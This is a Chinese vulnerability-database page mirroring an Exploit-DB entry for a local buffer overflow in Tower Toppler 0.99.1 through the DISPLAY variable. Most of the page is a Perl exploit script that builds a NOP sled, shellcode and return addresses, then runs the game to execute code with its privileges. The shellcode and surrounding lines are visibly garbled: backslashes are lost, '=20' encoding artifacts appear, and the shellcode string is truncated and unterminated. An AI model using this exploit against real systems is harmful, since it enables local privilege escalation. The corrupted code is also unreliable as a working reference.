Tower Toppler 0.99.1 – ‘Display’ Local Buffer Overflow

Tower Toppler 0.99.1 – ‘Display’ Local Buffer Overflow

漏洞ID 1053568 漏洞类型
发布时间 2002-03-02 更新时间 2002-03-02
图片[1]-Tower Toppler 0.99.1 – ‘Display’ Local Buffer Overflow-安全小百科CVE编号 N/A
图片[2]-Tower Toppler 0.99.1 – ‘Display’ Local Buffer Overflow-安全小百科CNNVD-ID N/A
漏洞平台 Unix CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22335
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7028/info

It has been reported that a buffer overflow exists in Tower Toppler. A local user may be able to exploit this issue to execute code with the privileges of the toppler program.

#!/usr/bin/perl
#[email protected] playing a game
#hi bob
$len = 1024;
$ret = 0xbfbffd31;
$nop = "x90";
$offset = 0;
$shellcode = =
"x31xc9xf7xe1x51x41x51x41x51x51xb0x61xcdx80x89xc3x68xD9x9d;

if (@ARGV == 1) {
    $offset = $ARGV[0];
}
 =20
for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
    $buffer .= $nop;
}
=20
$buffer .= $shellcode;

$new_ret = pack('l', ($ret + $offset));
=20
for ($i += length($shellcode); $i < $len; $i += 4) {
    $buffer .= $new_ret;
}

local($ENV{'EGG'}) = $buffer;=20
local($ENV{'DISPLAY'}) = $new_ret x 64;=20

exec("toppler 2>/dev/null");

相关推荐: Inter Net News server (inn) Buffer Overflow Vulnerability

Inter Net News server (inn) Buffer Overflow Vulnerability 漏洞ID 1104519 漏洞类型 Boundary Condition Error 发布时间 1999-11-24 更新时间 1999-11-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享